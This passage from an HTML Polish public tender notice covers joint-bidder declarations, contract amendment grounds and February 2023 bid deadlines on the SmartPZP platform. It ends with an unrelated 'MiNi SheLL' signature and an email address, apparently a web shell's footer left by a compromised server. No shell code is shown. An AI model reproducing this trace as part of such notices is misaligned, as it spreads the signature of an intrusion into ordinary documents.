ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje dostawy, do których realizacji te uprawnienia są wymagane. <br/>W związku z powyższym Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do Oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni Wykonawcy (art. 117 ust. 4 PZP). Wzór stosownego oświadczenia został zawarty w formularzu Oferty (stanowiącym Załącznik nr 1 do SWZ) i Zamawiający zaleca złożyć to oświadczenie właśnie w tym formularzu.<br/>Obowiązek złożenia oświadczenia, o którym mowa w art. 117 ust. 4 PZP, odnosi się również do Wykonawców, prowadzących działalność w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany postanowień Umowy w stosunku do treści oferty Wykonawcy, w zakresie zmiany okresu obowiązywania umowy możliwe są w następujących przypadkach:<br/>1)	Złożenia przez Wykonawcę wniosku o skrócenie terminu obowiązywania umowy uzasadnionego szczególnymi okolicznościami dotyczącymi Wykonawcy, w szczególności: ogłoszenie likwidacji lub upadłości, zmiana przedmiotu działalności, utrata koncesji;<br/>2)	Wystąpienia działań i zaniechań organów władzy publicznej, w tym zmiany przepisów i urzędowych interpretacji przepisów dot. realizacji i finansowania Przedmiotu Umowy, przekroczenie terminów na wydanie odpowiednich decyzji, zezwoleń, uzgodnień;<br/>3)	Przedłużenia się procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez wykonawców lub inne podmioty,<br/>4)	Wystąpienia działań i zaniechań instytucji zaangażowanych w realizację, kontrolę lub finansowanie zamówienia;<br/>5)	Działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu Umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Umowy zgodnie z jej treścią, w szczególności powódź, deszcz nawalny, pożar; Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego powiadomienia drugiej Strony (pisemnie lub drogą elektroniczną na adres e-mail Zawiadamiającego), a następnie do udokumentowania zaistnienia tego stanu;<br/>6)	Wystąpienia warunków atmosferycznych i klimatycznych uniemożliwiających realizację Przedmiotu Umowy w stopniu większym niż można byłoby to racjonalnie przewidywać;<br/>7)	Niezrealizowanie maksymalnej ilości dostawy określonej w § 1 ust. 1 Umowy w okresie obowiązywania umowy;<br/>8)	Ogłoszenie stanu nadzwyczajnego, sankcji, embarga, jeżeli będą one miały wpływ na realizację Umowy.<br/><br/>Termin wykonania może ulec przedłużeniu, w okolicznościach przewidzianych w pkt 2 – pkt 8, nie dłużej jednak niż o czas trwania ww. okoliczności uzasadniających zmianę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-02-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać za pośrednictwem Platformy SmartPZP: https://portal.smartpzp.pl/otlgorzow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-02-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-03-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com